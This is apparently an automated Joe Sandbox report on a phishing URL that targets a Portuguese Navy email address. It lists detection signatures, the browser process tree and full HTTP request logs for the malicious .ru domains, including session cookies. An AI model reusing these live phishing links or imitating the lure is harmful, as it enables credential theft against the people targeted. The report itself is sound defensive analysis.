Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://encryption-marinha.jkndfuzv.ru/PtM2i/$nadia.sofia.rijo@marinha.pt

Overview

General Information

Sample URL:https://encryption-marinha.jkndfuzv.ru/PtM2i/$nadia.sofia.rijo@marinha.pt
Analysis ID:1638470
Infos:

Detection

Score:48
Range:0 - 100
Confidence:100%

Signatures

Yara detected Obfuscation Via HangulCharacter
Creates files inside the system directory
Deletes files inside the Windows folder
URL contains potential PII (phishing indication)

Classification

  • System is w10x64
  • chrome.exe (PID: 3940 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 5628 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2032,i,811636083332308569,11067964146906542817,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=1756 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 6604 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://encryption-marinha.jkndfuzv.ru/PtM2i/$nadia.sofia.rijo@marinha.pt" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_91JoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
    No Sigma rule has matched
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    Phishing

    barindex
    Source: Yara matchFile source: dropped/chromecache_91, type: DROPPED
    Source: https://encryption-marinha.jkndfuzv.ru/PtM2i/$nadia.sofia.rijo@marinha.ptSample URL: PII: $nadia.sofia.rijo@marinha.pt
    Source: unknownHTTPS traffic detected: 142.250.186.68:443 -> 192.168.2.4:49718 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.43.175:443 -> 192.168.2.4:49720 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.43.175:443 -> 192.168.2.4:49719 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.4:49724 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.4:49723 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 151.101.66.137:443 -> 192.168.2.4:49722 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.16.2.189:443 -> 192.168.2.4:49727 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.153.160:443 -> 192.168.2.4:49733 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.4:49741 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49749 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.33.187.14:443 -> 192.168.2.4:49751 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.33.187.14:443 -> 192.168.2.4:49750 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49752 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.26.1.100:443 -> 192.168.2.4:49770 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.0.223:443 -> 192.168.2.4:49771 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 2.22.242.18:443 -> 192.168.2.4:49772 version: TLS 1.2
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
    Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
    Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
    Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
    Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.67
    Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.67
    Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.67
    Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.67
    Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.67
    Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
    Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
    Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
    Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.67
    Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.67
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /PtM2i/$nadia.sofia.rijo@marinha.pt HTTP/1.1Host: encryption-marinha.jkndfuzv.ruConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://encryption-marinha.jkndfuzv.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://encryption-marinha.jkndfuzv.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://encryption-marinha.jkndfuzv.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/c8ec7565fab7/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://encryption-marinha.jkndfuzv.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.png HTTP/1.1Host: developers.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://encryption-marinha.jkndfuzv.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEI0qDKAQig4coBCJWhywEInP7MAQiFoM0BCL7VzgEIgNbOAQjI3M4BCIrgzgEIruTOAQiL5c4BSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /kella$z8ye07 HTTP/1.1Host: jygdt.tjezyf.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://encryption-marinha.jkndfuzv.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://encryption-marinha.jkndfuzv.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /PtM2i/$nadia.sofia.rijo@marinha.pt HTTP/1.1Host: encryption-marinha.jkndfuzv.ruConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://encryption-marinha.jkndfuzv.ru/PtM2i/$nadia.sofia.rijo@marinha.ptAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Im05ZXRzT01LL0lkSVJUa29iOTN4UEE9PSIsInZhbHVlIjoiU1pVdytEenVRK0I5L2cwNVhsWkZIbTlkZWpJNVFVSFF4SkxHbkp3YVEvdkc5TlM1cDF3ZzdHVEZkNmc2NXFRM2Q5bVJ6Qm5seTArcW1PMGVUT3pnYW5jcXF1SzZQdW5EeGhwR09FZ2dWcFM3SFQrRjJWb0Q3d3IyOHdOaHhoU3UiLCJtYWMiOiJmNmY0NjIxNDdlMTBiMWUxYzhjODljYTZhNjhkM2VkMmM1OGYzNjUwZmVhMTFjODhmMjRlMDBhNDc1Nzg3Y2Q0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im1kUllRVUsrcFBSekF2YjlwSHF5aVE9PSIsInZhbHVlIjoiM3gzdExlVU9oYmNoSzBjZ1NuVEFqallJQ0orWmFZS2pMRFRUd3VDOHFrMjB5S2kweXljZUpoTkltaS9RNWFDWEhGVE9KOXVpcUg2b1NjdmhMZytjS3hVU2FKdFQ0ajgveUV2TUtHNFo2eEhRbjJDdWw3cEVkTTZ1QUZqUnZzYUYiLCJtYWMiOiI3ZTczOWQyZjNhMzFjN2U2NWQzNDBiZDJiZjZhNjI0M2QyYWQ3NTY2ZTYxNzIxMTZlZGIzMGEzMzAwZTUzNWVlIiwidGFnIjoiIn0%3D
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: encryption-marinha.jkndfuzv.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://encryption-marinha.jkndfuzv.ru/PtM2i/$nadia.sofia.rijo@marinha.ptAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImpTYThVRU5ha2hWclFtSnY2ZXhlQ0E9PSIsInZhbHVlIjoiaVlYVnFFQ2JRQkxtS3Badnk0OGh4bHdoOWlSbjlzSFE5YlNORnVVVDQ2cFhzZ0RHeTFDME9raUkvT3J2RHZxTjJnTTNoVXBIVG1mcUZDTlI0WlFwYW5MRE5FYUNXZ0kwL3BjY1hwdFJaK2hZZ3doSjRTb2RNMXRGUW04bVFYQUoiLCJtYWMiOiI5MGZjNTk2MzhmYzc0MTljMjkyZjEyYjExMDA2MTU2ODY0NDZmZGMwNGE5ZDVlOWVjMzYxZmIyZTQ2YTQ3ODkxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZ5NldoREFMbGE3dDNBZHRMczJtM1E9PSIsInZhbHVlIjoidklraU9aZU42aUlyU2ViSjFrQUR0N0F6dEFpL1pDcDhJNzN2dEYzajR6dEtjQ2ozdGsxRTNPREhuQ1Q2N0tXMU0wZ1JpOWxlcFN4eFVJaDM4SExLMGY5cHhzWTgwZ0o1cHI4ckwxVHJ2RkFnbUZsMi9sekdiQ0U0WWxtNUtZUVkiLCJtYWMiOiJlZmFkMDRhNjhjNTg5ZmE5N2M5MGM5ZWIwOWNlNzA3MmM5NWVmNzc1ODQzYWFlYTg2ZmVkNjZiYTU3MzY3NTIyIiwidGFnIjoiIn0%3D
    Source: global trafficHTTP traffic detected: GET /tqrmmkqnkybhgrcpajlvlmkvressy5l3xb609h7xeqsb767nl?YTUSIOUTJWFKEHXUXRYQVBSNX HTTP/1.1Host: encryption-marinha.jkndfuzv.ruConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://encryption-marinha.jkndfuzv.ru/PtM2i/$nadia.sofia.rijo@marinha.ptAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ik5KZjdZV2FoMGFlenR4VUFHcjZLVWc9PSIsInZhbHVlIjoiYlFWeWVlVVpXYWltd2cxb2RvNXJrZ3ZFVHkyZmNJNHRJUk5sNzl5OWtCamhKL2VSSkRpVkQvTDhrVzZhaytqUlRQcEZTOXFQRFVhRWxQZG1qdkxtYkd5R28xc2g1YmlHSUllZjRyTm5SQ1ZoZzVIRW90b00vSmhSelVBcHc5NFUiLCJtYWMiOiJkNzU2MThmMWE3ZTA3MmVkMWUzYjY4ODM5NmQwNTY5ZWMwOGFiMjA3Y2I0ZWNiZWExNGEyMjAwYWViMDY5MmYzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkhGc3lSU3RsRWlCQ0pEaXRsckx5cHc9PSIsInZhbHVlIjoiTnVKcVpFWktkalJqbEVEODJOUG0vNkhOK0RaYkUxVG9XaFVocnplajhUNVl2REVxbTJqTVhUNGM4QUtPdWx6UkVKdnB5NkpGall3MVAvMFhVZFFVaG5VODNiMkhxaGZMaEJrUVJsd25wTG1udytTRklGSDJId2dkMTZpRzgrYWwiLCJtYWMiOiI1M2I5ZmFmMzg3YzFiZDU5ODk5YjdjNTdhZGIyZGMxNDY0YWJkZTY5MDEyZjAxNTI1NzM3ZmJiYzk2ZjA5MWY4IiwidGFnIjoiIn0%3D
    Source: global trafficHTTP traffic detected: GET /348mXfXab6nFv46715 HTTP/1.1Host: encryption-marinha.jkndfuzv.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://encryption-marinha.jkndfuzv.ru/tqrmmkqnkybhgrcpajlvlmkvressy5l3xb609h7xeqsb767nl?YTUSIOUTJWFKEHXUXRYQVBSNXAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkZyZmxmV1dGTDVYS0xEUnVGYmpibmc9PSIsInZhbHVlIjoialhaNzhMdlBEYW91OHBKb2NoWXJlZ2ZXbXY2RW1DN3IxMDJhUHZIalk4dG8wVVpVc3BOL1AwMGZCdkFwV00rNUVCWmJvTzdJRXd2dVZvMzZtSjlQUnJUcUxlNHpVZUdRaDM4d3picnd1VldPYnNiY0wxYzY5ZDdrVExzZFBoSDMiLCJtYWMiOiI3ZjdmZWUyYzQ1Y2JiMzQ2N2I0YzQ0N2NlNzE0NmJjZTYyN2U0ZWM0NzQzNTFjZjYxMWNkMzc0MzNmMjMwMWM0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkJkNDE5K3ZRZFFNd01uMmFseXc5b3c9PSIsInZhbHVlIjoiQllDbm5YV0JrdE5ZU1c5eitnTTg2dEd4Y3JEc1lXakhkQWF0TFVCS01EczlpTzZoOVJHRlBmN3c5bUxOYXZMd09kUjZEZXpBZFYxNGpOZDRaSWU3eHA3WTRjUm1zZlAvaEtGdjZHcmFDdFk3S01lV01VMVVCZ3JZRS9CVitMMFYiLCJtYWMiOiJkOGMxZDY5MzczN2Q0OWI2NTgyYjMyNTE1MmMzMmM3ZTk1ZWUyNjBlYTA0OWU2NTUxYTMyNDNkZWMwYjJjNTFiIiwidGFnIjoiIn0%3D
    Source: global trafficHTTP traffic detected: GET /abvf9t8pq9ef30 HTTP/1.1Host: encryption-marinha.jkndfuzv.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://encryption-marinha.jkndfuzv.ru/tqrmmkqnkybhgrcpajlvlmkvressy5l3xb609h7xeqsb767nl?YTUSIOUTJWFKEHXUXRYQVBSNXAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkZyZmxmV1dGTDVYS0xEUnVGYmpibmc9PSIsInZhbHVlIjoialhaNzhMdlBEYW91OHBKb2NoWXJlZ2ZXbXY2RW1DN3IxMDJhUHZIalk4dG8wVVpVc3BOL1AwMGZCdkFwV00rNUVCWmJvTzdJRXd2dVZvMzZtSjlQUnJUcUxlNHpVZUdRaDM4d3picnd1VldPYnNiY0wxYzY5ZDdrVExzZFBoSDMiLCJtYWMiOiI3ZjdmZWUyYzQ1Y2JiMzQ2N2I0YzQ0N2NlNzE0NmJjZTYyN2U0ZWM0NzQzNTFjZjYxMWNkMzc0MzNmMjMwMWM0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkJkNDE5K3ZRZFFNd01uMmFseXc5b3c9PSIsInZhbHVlIjoiQllDbm5YV0JrdE5ZU1c5eitnTTg2dEd4Y3JEc1lXakhkQWF0TFVCS01EczlpTzZoOVJHRlBmN3c5bUxOYXZMd09kUjZEZXpBZFYxNGpOZDRaSWU3eHA3WTRjUm1zZlAvaEtGdjZHcmFDdFk3S01lV01VMVVCZ3JZRS9CVitMMFYiLCJtYWMiOiJkOGMxZDY5MzczN2Q0OWI2NTgyYjMyNTE1MmMzMmM3ZTk1ZWUyNjBlYTA0OWU2NTUxYTMyNDNkZWMwYjJjNTFiIiwidGFnIjoiIn0%3D
    Source: global trafficHTTP traffic detected: GET /GDSherpa-bold.woff2 HTTP/1.1Host: encryption-marinha.jkndfuzv.ruConnection: keep-aliveOrigin: https://encryption-marinha.jkndfuzv.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://encryption-marinha.jkndfuzv.ru/tqrmmkqnkybhgrcpajlvlmkvressy5l3xb609h7xeqsb767nl?YTUSIOUTJWFKEHXUXRYQVBSNXAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkZyZmxmV1dGTDVYS0xEUnVGYmpibmc9PSIsInZhbHVlIjoialhaNzhMdlBEYW91OHBKb2NoWXJlZ2ZXbXY2RW1DN3IxMDJhUHZIalk4dG8wVVpVc3BOL1AwMGZCdkFwV00rNUVCWmJvTzdJRXd2dVZvMzZtSjlQUnJUcUxlNHpVZUdRaDM4d3picnd1VldPYnNiY0wxYzY5ZDdrVExzZFBoSDMiLCJtYWMiOiI3ZjdmZWUyYzQ1Y2JiMzQ2N2I0YzQ0N2NlNzE0NmJjZTYyN2U0ZWM0NzQzNTFjZjYxMWNkMzc0MzNmMjMwMWM0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkJkNDE5K3ZRZFFNd01uMmFseXc5b3c9PSIsInZhbHVlIjoiQllDbm5YV0JrdE5ZU1c5eitnTTg2dEd4Y3JEc1lXakhkQWF0TFVCS01EczlpTzZoOVJHRlBmN3c5bUxOYXZMd09kUjZEZXpBZFYxNGpOZDRaSWU3eHA3WTRjUm1zZlAvaEtGdjZHcmFDdFk3S01lV01VMVVCZ3JZRS9CVitMMFYiLCJtYWMiOiJkOGMxZDY5MzczN2Q0OWI2NTgyYjMyNTE1MmMzMmM3ZTk1ZWUyNjBlYTA0OWU2NTUxYTMyNDNkZWMwYjJjNTFiIiwidGFnIjoiIn0%3D
    Source: global trafficHTTP traffic detected: GET /GDSherpa-bold.woff HTTP/1.1Host: encryption-marinha.jkndfuzv.ruConnection: keep-aliveOrigin: https://encryption-marinha.jkndfuzv.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://encryption-marinha.jkndfuzv.ru/tqrmmkqnkybhgrcpajlvlmkvressy5l3xb609h7xeqsb767nl?YTUSIOUTJWFKEHXUXRYQVBSNXAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkZyZmxmV1dGTDVYS0xEUnVGYmpibmc9PSIsInZhbHVlIjoialhaNzhMdlBEYW91OHBKb2NoWXJlZ2ZXbXY2RW1DN3IxMDJhUHZIalk4dG8wVVpVc3BOL1AwMGZCdkFwV00rNUVCWmJvTzdJRXd2dVZvMzZtSjlQUnJUcUxlNHpVZUdRaDM4d3picnd1VldPYnNiY0wxYzY5ZDdrVExzZFBoSDMiLCJtYWMiOiI3ZjdmZWUyYzQ1Y2JiMzQ2N2I0YzQ0N2NlNzE0NmJjZTYyN2U0ZWM0NzQzNTFjZjYxMWNkMzc0MzNmMjMwMWM0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkJkNDE5K3ZRZFFNd01uMmFseXc5b3c9PSIsInZhbHVlIjoiQllDbm5YV0JrdE5ZU1c5eitnTTg2dEd4Y3JEc1lXakhkQWF0TFVCS01EczlpTzZoOVJHRlBmN3c5bUxOYXZMd09kUjZEZXpBZFYxNGpOZDRaSWU3eHA3WTRjUm1zZlAvaEtGdjZHcmFDdFk3S01lV01VMVVCZ3JZRS9CVitMMFYiLCJtYWMiOiJkOGMxZDY5MzczN2Q0OWI2NTgyYjMyNTE1MmMzMmM3ZTk1ZWUyNjBlYTA0OWU2NTUxYTMyNDNkZWMwYjJjNTFiIiwidGFnIjoiIn0%3D
